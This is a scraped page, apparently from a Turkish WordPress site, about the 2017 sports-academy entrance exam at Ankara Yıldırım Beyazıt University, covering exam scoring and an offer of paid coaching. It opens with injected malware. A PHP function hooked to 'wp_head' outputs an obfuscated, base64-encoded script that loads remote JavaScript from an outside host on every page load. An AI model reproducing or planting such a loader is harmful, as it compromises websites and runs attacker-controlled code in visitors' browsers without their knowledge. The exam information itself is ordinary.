function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); Ankara- Yıldırım Beyazıt Üniversitesi Besyo Sınavı 2017 – Besyo Hakkında Güncel Bilgiler

Ankara- Yıldırım Beyazıt Üniversitesi Besyo Sınavı 2017

İnstagram Takip Twitter

Sınavdan önce 1 hafta boyunca birebir parkura çalışmak için 541 476 78 92 ile iletişime geçebilirsiniz.

Ankara- Yıldırım Beyazıt Üniversitesi Besyo Sınavı açıklandı.

Özel Yetenek Sınavı, Sporcu Özgeçmiş Puanı ve Koordinasyon Parkuru olacak şekilde gerçekleştirilecektir.
Belgelendirilmiş Sporcu Özgeçmişlerinden alınan puanınn %30’u ve Koordinasyon Parkurundan alınan puanın %70’i adayın Özel Yetenek Sınav Puanını (ÖYSP) oluşturacaktır

Adayların başvuru yapması için Sporcu Özgeçmiş Puanına (SÖP) sahip olması zorunlu değildir. Sporcu özgeçmişine sahip olan adaylar kılavuzda belirtilen SÖP tablosundaki kritere uygunluklarını belgeledikleri takdirde uygun sporcu özgeçmiş puanını alacaktır. Her adaya Koordinasyon Parkurunda tek deneme hakkı verilecektir.

Ön duyuru

__

Kılavuz

PROJELERİMİZLE ÖĞRENCİLERİMİZİN YANINDAYIZ

1-) Besyocuyuz.com ailesi olarak çalışma imkanı olmayan öğrencilerimize destek olmak için bir çok üniversitenin sınavından önce sınav yerinde tanıdığımız ve güvendiğimiz hocalarla sınavla birebir çalışma organize edeceğiz.
2-) Besyocuyuz.com bu çalışmadan hiç bir kar amacı gütmemektedir. Her bölgedeki hoca kendi emeğinin karşılığı olan ve size daha önceden konuştuğunuzda bildirdiği ücreti alacaktır.
3-) Öğrenci çalışma takvimini ve içeriğini çalışmadan önce rezervasyon sırasında öğrenebilir.
4-) Bu çalışmada sıkıntı yaşayan her öğrencinin öncelikli muhatabı bölgedeki hocadır. Sıkıntının çözülmemesi durumunda Besyocuyuz.com’dur. Besyocuyuz.com ile https://www.instagram.com/besyocuyuz.official/ adresinden iletişime geçebilirsiniz.

Bu Çalışma Ne Kazandıracak?
1-) Sınava birebir olarak 2 ay, 1 ay, 3 hafta, 2 hafta ya da isteğe göre 1 haftalık çalışan öğrenci sınav anındaki baskıyı ve sınav parkuruna yönelik bilinçsizliğini azaltmış olacaktır. Üniversitenin bulunduğu şehirdeki hoca şüphesiz ki o üniversitenin parkurunu sınavla birebir kuracaktır. Antrenör çalışma yapacağı süre kapsamında ücretlendirme yapacaktır.
2-) Öğrenci çalışma sırasında arkadaş grubu edinip sınav öncesi ve sırasında psikolojisini yüksek tutacaktır.
3-) Antrenörler fiziksel olduğu kadar mental olarakta öğrenciyi sınav için öğrencinin saygı ve sevgisine orantılı olarak destekleyecektir.

İletişim Alp Yıldırım 0 541 476 78 92

 

0

Bir Cevap Yazın

Menü